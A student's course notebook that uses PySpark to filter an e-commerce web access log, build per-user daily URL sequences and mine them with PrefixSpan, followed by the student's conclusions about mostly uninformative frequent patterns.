## Actual steps for filtering the spark data

Now you write your code to

1. Convert spark RDD to Data Frame, then filter out all unnecessary lines as highlighted in <font color=orange>orange</font> in the above section `Understand the Web Log Format`.
2. Get a list of IPs (let's call it `uniqueIPs`) who performed the action of adding product(s) to the basket
3. filter out all records whose IP does not belong to the IP list in step 2.
4. Note step 2 and 3 should not be performed literally. I am using the language for easy understanding. This will be explained further in next section (see `last note`)



## Important resources for wrangling spark data, should you encounter problems

- When testing your code you have to go through many trial and error cycles; It may speed up your coding process by creating a reletively smaller data file (say, 10,000 ~ 30,000 lines) to test your code until it succeeds.
- Please bookmark [this tutorial](https://sparkbyexamples.com/) and study relevant examples (browse the menu on the left) if you have trouble with certain functions.
- You may want to explore `where` or `filter`, `groupBy`, `agg`, `withColumn`, `Date and Timestamp Functions`, `udf` (user defined function)
- **Note** the examples in general ommited import statements. If you have errors saying certain objects not defined, it may be resolved by
```python
from pyspark.sql.functions import *
from from pyspark.sql.types import *
```
Or you search google with something like `pyspark import udf`
- One useful function to be applied to data frame column is `.isin()` which takes a list and check column elements against that list. see https://spark.apache.org/docs/latest/api/python/reference/api/pyspark.sql.Column.isin.html?highlight=isin
- To convert a spark dataframe column into a python list, you need to use toPandas then pandas function will work, for example to get first name list from above example df:
```python
h = df.select("first_name").toPandas()
huge_list = list( h["first_name"].values)
huge_list
```

- **Last note**: Filtering a spark data frame with a list could be extremely slow if you deal with huge list and big data frame. Standard approach is to use two dataframes and apply [inner join](https://sparkbyexamples.com/pyspark/pyspark-join-explained-with-examples/) for this scenario. So please use inner join or simply use sql syntax. If you stick with `.isin(huge_list)` you get 2 points deduction.

## <font color=red>You code for filtering spark data here </font>

In [None]:
#TEST EXAMPLE
from pyspark.sql import SparkSession
from pyspark import SparkContext
import pyspark.sql.functions as F

sc.stop()

sc = SparkContext('local[*]') # comment this in case you already have SparkContext running
dataList = [("James", "Cameron","Sales","NY",90000,34,10000),
    ("Michael", "Johnson","Sales","NY",86000,56,20000),
    ("Robert", "Stromberg","Sales","CA",81000,30,23000),
    ("Maria", "McDonald","Finance","CA",90000,24,23000),
    ("Raman","Pearson","Finance","CA",99000,40,24000),
    ("Scott","Kindel","Finance","NY",83000,36,19000),
    ("Jen","Lewis","Finance","NY",79000,53,15000),
    ("Jeff", "Scott","Marketing","CA",80000,25,18000),
    ("Kumar", "Jobs","Marketing","NY",91000,50,21000)
  ]
rdd=sc.parallelize(dataList) # Note RDD is created from list, similar to creating it from a text file

# *** Now we convert rdd to dataframe
spark = SparkSession(sc) # this is necessary for rdd to be converted to data frame

# converting RDD to DataFrame
df = rdd.toDF(schema = ["first_name", "last_name","department","state","salary","age","bonus"])

# Show schema
df.printSchema()

# Show data frame
df.show(truncate=False)

# Note we create two new columns from grouped data:
# they are renamed as dep_salary, dep_individual_salary
df.groupBy("department").agg(F.sum('salary').alias("dep_salary"),
          F.collect_list('salary').alias("dep_individual_salary")).show()

root
 |-- first_name: string (nullable = true)
 |-- last_name: string (nullable = true)
 |-- department: string (nullable = true)
 |-- state: string (nullable = true)
 |-- salary: long (nullable = true)
 |-- age: long (nullable = true)
 |-- bonus: long (nullable = true)

+----------+---------+----------+-----+------+---+-----+
|first_name|last_name|department|state|salary|age|bonus|
+----------+---------+----------+-----+------+---+-----+
|James     |Cameron  |Sales     |NY   |90000 |34 |10000|
|Michael   |Johnson  |Sales     |NY   |86000 |56 |20000|
|Robert    |Stromberg|Sales     |CA   |81000 |30 |23000|
|Maria     |McDonald |Finance   |CA   |90000 |24 |23000|
|Raman     |Pearson  |Finance   |CA   |99000 |40 |24000|
|Scott     |Kindel   |Finance   |NY   |83000 |36 |19000|
|Jen       |Lewis    |Finance   |NY   |79000 |53 |15000|
|Jeff      |Scott    |Marketing |CA   |80000 |25 |18000|
|Kumar     |Jobs     |Marketing |NY   |91000 |50 |21000|
+----------+---------+----------+-----+-----

In [None]:
from pyspark.sql import SparkSession
from pyspark import SparkContext
import pyspark.sql.functions as F

sc.stop()

sc = SparkContext('local[*]') # comment this in case you already have SparkContext running

data = sc.textFile("access.log")
# data = sc.textFile("large1000000.log")
# data = sc.textFile("small20.log")

transactions = data.map(myParser)

# *** Now we convert rdd to dataframe
spark = SparkSession(sc) # this is necessary for rdd to be converted to data frame

# converting RDD to DataFrame
df = transactions.toDF(schema = ["ip", "timestamp","request_url","status_code",])

df.show()
print(df.count())

+-------------+-------------------+--------------------+-----------+
|           ip|          timestamp|         request_url|status_code|
+-------------+-------------------+--------------------+-----------+
| 54.36.149.41|2019-01-22 03:56:14|/filter/27|13%20%...|        200|
|  31.56.96.51|2019-01-22 03:56:16|/image/60844/prod...|        200|
|  31.56.96.51|2019-01-22 03:56:16|/image/61474/prod...|        200|
|40.77.167.129|2019-01-22 03:56:17|/image/14925/prod...|        200|
|  91.99.72.15|2019-01-22 03:56:17|/product/31893/62...|        200|
|40.77.167.129|2019-01-22 03:56:17|/image/23488/prod...|        200|
|40.77.167.129|2019-01-22 03:56:18|/image/45437/prod...|        200|
|40.77.167.129|2019-01-22 03:56:18|/image/576/articl...|        200|
|66.249.66.194|2019-01-22 03:56:18|/filter/b41,b665,...|        200|
|40.77.167.129|2019-01-22 03:56:18|/image/57710/prod...|        200|
|207.46.13.136|2019-01-22 03:56:18|      /product/10214|        200|
|40.77.167.129|2019-01-22 03:56:19

In [None]:
df.createOrReplaceTempView("df")
status_code_df = spark.sql("SELECT * FROM df WHERE status_code == 200 OR (status_code < 400 AND status_code >=300)")
status_code_df.show(truncate=False)
print(status_code_df.count())

+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|ip           |timestamp          |request_url                                                                                                                                                                   |status_code|
+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|54.36.149.41 |2019-01-22 03:56:14|/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53        |200        |
|31.56.96.51  |2019-01-22 03:56:16|/image/60844/productModel/200x200                                        

In [None]:
# Test same query using different method to ensure everything works as expected
df_right_status_code = df.filter( (df.status_code == 200) |  ((df.status_code >= 300) & (df.status_code < 400)))
df_right_status_code.show(truncate=False)
print(df_right_status_code.count())

+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|ip           |timestamp          |request_url                                                                                                                                                                   |status_code|
+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|54.36.149.41 |2019-01-22 03:56:14|/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53        |200        |
|31.56.96.51  |2019-01-22 03:56:16|/image/60844/productModel/200x200                                        

In [None]:
df_no_js = df_right_status_code.filter(~df_right_status_code.request_url.contains('js'))
df_no_css = df_no_js.filter(~df_no_js.request_url.contains('css'))
df_no_css.show(truncate=False)
print(df_no_css.count())

+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|ip           |timestamp          |request_url                                                                                                                                                                   |status_code|
+-------------+-------------------+------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+-----------+
|54.36.149.41 |2019-01-22 03:56:14|/filter/27|13%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,27|%DA%A9%D9%85%D8%AA%D8%B1%20%D8%A7%D8%B2%205%20%D9%85%DA%AF%D8%A7%D9%BE%DB%8C%DA%A9%D8%B3%D9%84,p53        |200        |
|31.56.96.51  |2019-01-22 03:56:16|/image/60844/productModel/200x200                                        

In [None]:
df_basket_add = df_no_css.filter(df_no_css.request_url.contains('/basket/add'))
df_basket_add.show(truncate=False)
print(df_basket_add.count())

+---------------+-------------------+-------------------------------------------+-----------+
|ip             |timestamp          |request_url                                |status_code|
+---------------+-------------------+-------------------------------------------+-----------+
|5.117.242.204  |2019-01-22 04:13:19|/basket/add/55839?mobile=1&addedValues=    |302        |
|204.18.175.72  |2019-01-22 04:33:20|/basket/add/5544?mobile=1&addedValues=     |302        |
|89.36.63.1     |2019-01-22 04:39:41|/basket/add/64714?mobile=1&addedValues=    |302        |
|5.125.13.45    |2019-01-22 05:18:30|/basket/add/64756?mobile=1&addedValues=    |302        |
|188.166.113.28 |2019-01-22 06:44:31|/basket/add/62139?mobile=1&addedValues=    |302        |
|5.211.134.24   |2019-01-22 06:52:07|/basket/add/63294?mobile=1&addedValues=    |302        |
|5.235.227.104  |2019-01-22 06:57:25|/basket/add/62363?mobile=1&addedValues=    |302        |
|5.119.221.47   |2019-01-22 06:58:35|/basket/add/65278?mobil

In [None]:
unique_ips =  df_basket_add.dropDuplicates(["ip"]).select("ip")
unique_ips.show(truncate=False)
print(unique_ips.count())

+---------------+
|ip             |
+---------------+
|5.117.242.204  |
|83.122.120.209 |
|89.196.66.66   |
|2.181.243.101  |
|178.252.144.130|
|5.125.13.45    |
|5.114.160.181  |
|2.191.96.86    |
|5.237.115.244  |
|188.166.113.28 |
|5.114.183.125  |
|5.211.134.24   |
|204.18.175.72  |
|185.30.7.254   |
|91.208.165.222 |
|178.252.166.116|
|5.119.221.47   |
|5.121.110.137  |
|204.18.119.253 |
|5.235.227.104  |
+---------------+
only showing top 20 rows

2304


In [None]:
unique_ips.createOrReplaceTempView("unique_ips")
df_no_css.createOrReplaceTempView("df_no_css")
df_filtered = spark.sql("SELECT * FROM df_no_css INNER JOIN unique_ips ON df_no_css.ip = unique_ips.ip")
df_filtered.show(truncate=False)
df_filtered.createOrReplaceTempView("df_filtered")
print(df_filtered.count())

+------------+-------------------+-------------------------------------------------------------------------------------+-----------+------------+
|ip          |timestamp          |request_url                                                                          |status_code|ip          |
+------------+-------------------+-------------------------------------------------------------------------------------+-----------+------------+
|81.90.144.56|2019-01-22 07:41:48|/browse/home-appliances/%D9%84%D9%88%D8%A7%D8%B2%D9%85-%D8%AE%D8%A7%D9%86%DA%AF%DB%8C|200        |81.90.144.56|
|81.90.144.56|2019-01-22 07:41:50|/image/%7B%7BbasketItem.id%7D%7D?type=productModel&wh=50x50                          |200        |81.90.144.56|
|81.90.144.56|2019-01-22 07:41:51|/image/55/productType/240x180                                                        |200        |81.90.144.56|
|81.90.144.56|2019-01-22 07:41:51|/image/8/productType/240x180                                                         |200 

## Prepare Sequential Data for prefixspan

After you get all data in spark and filter out unnecessary records, we want to prepare the sequential data for prefixspan.

In this project we define a sequence of events as:

> A series of URLs requested by one particular user (a user is identified by the IP address), within one day.
e.g., on 26/Jan/2019 a user visited urls at  `/A` then `/B` then at the same timestamp `/C` and `/D`, this will form a sequence as a list of list:

```python
[ ["/A"], ["/B"], ["/C", "/D"] ]
```

So now with your spark data frame (assuming all irrelevant rows filtered out), let's still call it `df`, you want to:


1. Group the dataframe by `(IP, TIMESTAMP)` so actions from same IP and at the same timestamp are grouped together
  - now each group contains one or a set of urls which we define as one event of the sequence
  - you want to apply an aggregation (`agg`) function to create a **list of URLs** for each group, let's call this new aggregated column `EVENTS` and let's call this aggregated data frame `DF2` (refer to reources listed above and refer to the example code above in `Converting RDD to dataframe` section)
2. From `DF2` create a new column called `DATE` which converts the `TIMESTAMP` into a date object so timestamps of the same day have the same values in this column (refer to reources listed above).
3. Since `DATE` column round timestamp to date so if you group the data frame by `(IP, DATE)` you will have in  each group a list of `EVENTS` from each user in each day  -- this is exactly the sequence we defined. So after grouping, just create another aggregated column `SEQUENCE` which consists list of `EVENTS` of the group (refer to the example code above in `Converting RDD to dataframe` section)
4. Finally you want to print out 30 rows from column `SEQUENCE` to verify you did it right.

## <font color=red>You code for `Prepare Sequential Data for prefixspan` here </font>

In [None]:
import gc
gc.collect()

6997

In [None]:
DF2 = df_filtered.groupBy("df_no_css.ip", "timestamp").agg(F.collect_list('request_url').alias('EVENTS'))
DF2.show(truncate=False)
DF2.count()

+--------------+-------------------+--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------+
|ip            |timestamp          |EVENTS                                                                                                                                                                                                                                                                                                                                                

435644

In [None]:
# convert timestamp to DATE
# DF2.schema("timestamp").dataType
DF2 = DF2.withColumn("DATE", F.to_date('timestamp'))
DF2.show(truncate=True)
DF2.count()

+--------------+-------------------+--------------------+----------+
|            ip|          timestamp|              EVENTS|      DATE|
+--------------+-------------------+--------------------+----------+
|10.139.192.130|2019-01-26 13:03:54|   [/filter/b43,p63]|2019-01-26|
|10.139.192.130|2019-01-26 13:03:55|[/image/238/brand...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:56|[/image/39/produc...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:57|[/image/3437/prod...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:58|[/image/5947/prod...|2019-01-26|
|10.139.192.130|2019-01-26 13:03:59|[/image/5384/prod...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:00|[/image/969/artic...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:01|[/static/images/n...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:02|[/static/images/z...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:03|[/static/images/f...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:04|[/image/777/mainS...|2019-01-26|
|10.139.192.130|2019-01-26 13:04:5

435644

In [None]:
DF2 = DF2.groupBy("ip", "DATE").agg(F.collect_list('EVENTS').alias('SEQUENCE'))
DF2.show(truncate=True)
DF2.count()

+---------------+----------+--------------------+
|             ip|      DATE|            SEQUENCE|
+---------------+----------+--------------------+
| 10.139.192.130|2019-01-26|[[/filter/b43,p63...|
|  10.233.251.23|2019-01-24|[[/filter/b256,p4...|
|   10.87.76.147|2019-01-23|[[/browse/air-con...|
|   10.87.76.147|2019-01-24|[[/image/33968?na...|
| 102.165.34.250|2019-01-22|[[/image/33980?na...|
| 102.165.34.250|2019-01-23|[[/filter/b261], ...|
| 102.165.34.250|2019-01-24|[[/], [/settings/...|
| 102.165.34.250|2019-01-25|[[/browse/Screen-...|
|  109.109.42.42|2019-01-22|[[/m/browse/appli...|
| 109.162.131.74|2019-01-22|[[/browse/dishwas...|
| 109.162.131.74|2019-01-23|[[/product/16721/...|
|  113.203.54.71|2019-01-25|[[/amp-helper-fra...|
|128.199.117.156|2019-01-22|[[/image/47987/pr...|
|128.199.117.156|2019-01-24|[[/amp-helper-fra...|
|128.199.117.156|2019-01-25|[[/image/32172?na...|
| 128.65.171.197|2019-01-26|[[/filter/b36,p5]...|
| 138.68.132.207|2019-01-23|[[/product/34286/...|


3167

In [None]:
DF2.show(n=30, truncate=True)

+---------------+----------+--------------------+
|             ip|      DATE|            SEQUENCE|
+---------------+----------+--------------------+
| 10.139.192.130|2019-01-26|[[/filter/b43,p63...|
|  10.233.251.23|2019-01-24|[[/filter/b256,p4...|
|   10.87.76.147|2019-01-23|[[/browse/air-con...|
|   10.87.76.147|2019-01-24|[[/image/33968?na...|
| 102.165.34.250|2019-01-22|[[/image/33980?na...|
| 102.165.34.250|2019-01-23|[[/filter/b261], ...|
| 102.165.34.250|2019-01-24|[[/], [/settings/...|
| 102.165.34.250|2019-01-25|[[/browse/Screen-...|
|  109.109.42.42|2019-01-22|[[/m/browse/appli...|
| 109.162.131.74|2019-01-22|[[/browse/dishwas...|
| 109.162.131.74|2019-01-23|[[/product/16721/...|
|  113.203.54.71|2019-01-25|[[/amp-helper-fra...|
|128.199.117.156|2019-01-22|[[/image/47987/pr...|
|128.199.117.156|2019-01-24|[[/amp-helper-fra...|
|128.199.117.156|2019-01-25|[[/image/32172?na...|
| 128.65.171.197|2019-01-26|[[/filter/b36,p5]...|
| 138.68.132.207|2019-01-23|[[/product/34286/...|


## Show time

Now you want to use spark library for prefixspan to mine the sequence data. This is just a simple call:
https://spark.apache.org/docs/latest/api/python//reference/api/pyspark.ml.fpm.PrefixSpan.html

- Note default sequence column in the input data frame is `sequence`, you can change that to match your data frame:
```python
prefixSpan.setSequenceCol('SEQUENCE')
```
- you want to play with `MinSupport` and `MaxPatternLength` in order to get meaningful patterns. Start with higher `MinSupport` value (0.5 is a really high value but you can start with it) and lower `MaxPatternLength` (5 is a good start) to speed up your test run.

- You want to write a summary about your observed patterns in the output.

## <font color=red>You code for doing prefixspan here </font>

In [None]:
from pyspark.ml.fpm import PrefixSpan

prefixSpan = PrefixSpan()
prefixSpan.setSequenceCol('SEQUENCE')
prefixSpan.setMinSupport(0.5)
prefixSpan.setMaxPatternLength(5)
prefixSpan.findFrequentSequentialPatterns(DF2).sort("SEQUENCE").show(truncate=False)

+--------------------------------------------------------------------------------------------------------------------+----+
|sequence                                                                                                            |freq|
+--------------------------------------------------------------------------------------------------------------------+----+
|[[/basket/checkout]]                                                                                                |1639|
|[[/basket/view]]                                                                                                    |1617|
|[[/favicon.ico]]                                                                                                    |1603|
|[[/settings/logo]]                                                                                                  |2931|
|[[/settings/logo], [/basket/checkout]]                                                                              |1633|
|[[/sett

In [None]:
results = dict()
support_params = [0.5, 0.2]
max_pattern_params = [100, 50, 30, 9]

for min_support in support_params:
    results[min_support] = dict()
    for max_pattern_length in max_pattern_params:
        print(min_support, max_pattern_length)
        prefixSpan = PrefixSpan()
        prefixSpan.setSequenceCol('SEQUENCE')
        prefixSpan.setMinSupport(min_support)
        prefixSpan.setMaxPatternLength(max_pattern_length)
        result = prefixSpan.findFrequentSequentialPatterns(DF2).sort('freq', ascending=False)
        result.show()
        results[min_support][max_pattern_length] = result

0.5 100
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|  [[/settings/logo]]|2931|
|[[/settings/logo]...|2750|
|[[/settings/logo]...|2547|
|[[/settings/logo]...|2319|
|[[/static/images/...|2198|
|[[/static/images/...|2194|
|[[/static/images/...|2192|
|[[/static/images/...|2191|
|[[/static/images/...|2190|
|[[/static/images/...|2187|
|[[/static/images/...|2186|
|[[/static/images/...|2185|
|[[/settings/logo]...|2101|
|[[/static/images/...|2097|
|[[/static/images/...|2090|
|[[/static/images/...|2089|
|[[/static/images/...|2086|
|[[/static/images/...|2084|
|[[/static/images/...|2067|
|[[/static/images/...|2041|
+--------------------+----+
only showing top 20 rows

0.5 50
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|  [[/settings/logo]]|2931|
|[[/settings/logo]...|2750|
|[[/settings/logo]...|2547|
|[[/settings/logo]...|2319|
|[[/static/images/...|2198|
|[[/static/images/...|2194|
|[[/static/images/...|2192|
|[[/sta

In [None]:
results = dict()
support_params = [0.5, 0.4, 0.2]
max_pattern_params = [50, 30, 9, 5, 4]

for min_support in support_params:
    results[min_support] = dict()
    for max_pattern_length in max_pattern_params:
        print(min_support, max_pattern_length)
        prefixSpan = PrefixSpan()
        prefixSpan.setSequenceCol('SEQUENCE')
        prefixSpan.setMinSupport(min_support)
        prefixSpan.setMaxPatternLength(max_pattern_length)
        result = prefixSpan.findFrequentSequentialPatterns(DF2).sort('freq', ascending=False))
        result.show()
        results[min_support][max_pattern_length] = result

0.5 50
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|[[/static/images/...|1589|
|[[/static/images/...|1590|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1592|
|[[/static/images/...|1597|
|[[/static/images/...|1597|
|[[/static/images/...|1597|
|[[/static/images/...|1598|
|[[/static/images/...|1599|
|[[/static/images/...|1600|
|[[/static/images/...|1601|
|[[/static/images/...|1601|
|[[/static/images/...|1601|
|[[/static/images/...|1601|
|    [[/favicon.ico]]|1603|
|[[/static/images/...|1603|
|[[/static/images/...|1605|
|[[/static/images/...|1605|
+--------------------+----+
only showing top 20 rows

0.5 30
+--------------------+----+
|            sequence|freq|
+--------------------+----+
|[[/static/images/...|1589|
|[[/static/images/...|1590|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1591|
|[[/static/images/...|1592|
|[[/static/images/...|1597|
|[[/stat

In [None]:
results.get(0.2).get(50).sort('freq', ascending=False).show(truncate=False, n=100)

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|sequence                                                                                                                                                              |freq|
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|[[/settings/logo]]                                                                                                                                                    |2931|
|[[/settings/logo], [/settings/logo]]                                                                                                                                  |2750|
|[[/settings/logo], [/settings/logo], [/settings/logo]]                                                                           

In [None]:
results.get(0.5).get(50).sort('freq', ascending=False).show(truncate=False, n=100)

+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|sequence                                                                                                                                                              |freq|
+----------------------------------------------------------------------------------------------------------------------------------------------------------------------+----+
|[[/settings/logo]]                                                                                                                                                    |2931|
|[[/settings/logo], [/settings/logo]]                                                                                                                                  |2750|
|[[/settings/logo], [/settings/logo], [/settings/logo]]                                                                           

In [None]:
final_prefixspan = results.get(0.2).get(100)
final_prefixspan.printSchema()
# final_prefixspan.where(F.array_contains(col("sequence.element"),'settings')).show(false)
# final_prefixspan.filter(~final_prefixspan.sequence.contains('settings')).show()

# df_basket_add = df_no_css.filter(df_no_css.request_url.contains('/basket/add'))
# df_basket_add.show(truncate=False)
# print(df_basket_add.count())

explode_test = final_prefixspan.select(F.explode(col("sequence")).alias("element"), col("freq"))
explode_test.show()

root
 |-- sequence: array (nullable = false)
 |    |-- element: array (containsNull = false)
 |    |    |-- element: string (containsNull = false)
 |-- freq: long (nullable = false)

+--------------------+----+
|             element|freq|
+--------------------+----+
|    [/settings/logo]|2931|
|    [/settings/logo]|2750|
|    [/settings/logo]|2750|
|    [/settings/logo]|2547|
|    [/settings/logo]|2547|
|    [/settings/logo]|2547|
|    [/settings/logo]|2319|
|    [/settings/logo]|2319|
|    [/settings/logo]|2319|
|    [/settings/logo]|2319|
|[/static/images/a...|2198|
|[/static/images/a...|2194|
|[/static/images/g...|2192|
|[/static/images/g...|2191|
|[/static/images/a...|2190|
|[/static/images/g...|2187|
|[/static/images/g...|2186|
|[/static/images/g...|2185|
|    [/settings/logo]|2101|
|    [/settings/logo]|2101|
+--------------------+----+
only showing top 20 rows



In [None]:
explode_test.where(~F.array_contains(col('element'), '/static/images')).where(~F.array_contains(col('element'), '/settings/logo')).show(truncate=False)


+-----------------------------------------------------------------------------------+----+
|element                                                                            |freq|
+-----------------------------------------------------------------------------------+----+
|[/static/images/amp/instagram.png]                                                 |2198|
|[/static/images/amp/telegram.png]                                                  |2194|
|[/static/images/guarantees/goodShopping.png]                                       |2192|
|[/static/images/guarantees/support.png]                                            |2191|
|[/static/images/amp/blog.png]                                                      |2190|
|[/static/images/guarantees/fastDelivery.png]                                       |2187|
|[/static/images/guarantees/warranty.png]                                           |2186|
|[/static/images/guarantees/bestPrice.png]                                          |2185|

In [None]:
explode_test2 = explode_test.select(F.explode(col("element")).alias("element2"), col("freq"))

In [None]:
explode_test2.filter(~explode_test2.element2.contains('png')).filter(~explode_test2.element2.contains('settings')).filter(~explode_test2.element2.contains('favicon')).filter(~explode_test2.element2.contains('basket')).filter(~explode_test2.element2.contains('alexaGooleAnalitic')).filter(~explode_test2.element2.contains('/image')).filter(~explode_test2.element2.contains('/static')).show(truncate=False)

+----------------------------------------------------------------------------------------------------+----+
|element2                                                                                            |freq|
+----------------------------------------------------------------------------------------------------+----+
|/                                                                                                   |894 |
|/                                                                                                   |883 |
|/amp-helper-frame.html?appId=a624a1c1-0c93-466a-a546-e146710f97e6&parentOrigin=https://www.zanbil.ir|878 |
|/                                                                                                   |858 |
|/amp-helper-frame.html?appId=a624a1c1-0c93-466a-a546-e146710f97e6&parentOrigin=https://www.zanbil.ir|826 |
|/site/enamad                                                                                        |819 |
|/                          

## <font color=red>You summary and conlusions here </font>

# Conclusion

I ended up with a minimum support of 0.2 and a high maximum pattern lenght of 100.
However, the most frequent patterns were not of any interest because they were one of the following scenarios:
1. '/settings'
2. '/static' or '.png' or 'images'
3. '/alexaGooleAnaliticalexaGooleAnalitic'

These are events that would occur regardless of whether a user brought the product (at least it would seem so). Since it would be to expensive time-wise and computationally to redo the filtering at this stage, I tried to expand the dataframe and see if I could find any patterns. However, again I found patterns of the irrelvant behavior such as site or html settings.

In addition, I also compared the results of different minimum support and maximu pattern lengths, where I noticed that the most frequent ones were about the same.

So what can we learn exactly? Here are my top 3 lessons and discoveries.

1. 80-90% of the time in the model building process is on finding the best data (data integration if ncessary), and cleaning the data so that the model can read it. When we get to the actual model building part, due to computational limits, a large portion of time is spent just waiting for the code to finish running.

2. Prepare early in advance. I should have looked at the most frequent URLs before using PrefixSpan to eliminate any unnecessary URLs that would interfere with the results. Realizing that towards the end of the deadline made it too late, so I should have planned earlier.

3. When we have large amounts of data, it's important to split and test your code on different sets of the larger portion. Otherwise you may not realize that your code doesn't work until the near end of the project.


# DELIVER (individually)



Submit on canvas:

* This notebook with all results shown
* If you discussed with classmates and get inspirations during the project write down his/her names in next section. No points deductions but you have to be honest.



I discussed with Kenny, Bo, Ian Shyue, Yuming briefly just on progress.

<font size="+2" color="#003300">I hereby declare that, except for the code provided by the course instructors, all of my code, report, and figures were produced by myself.</font>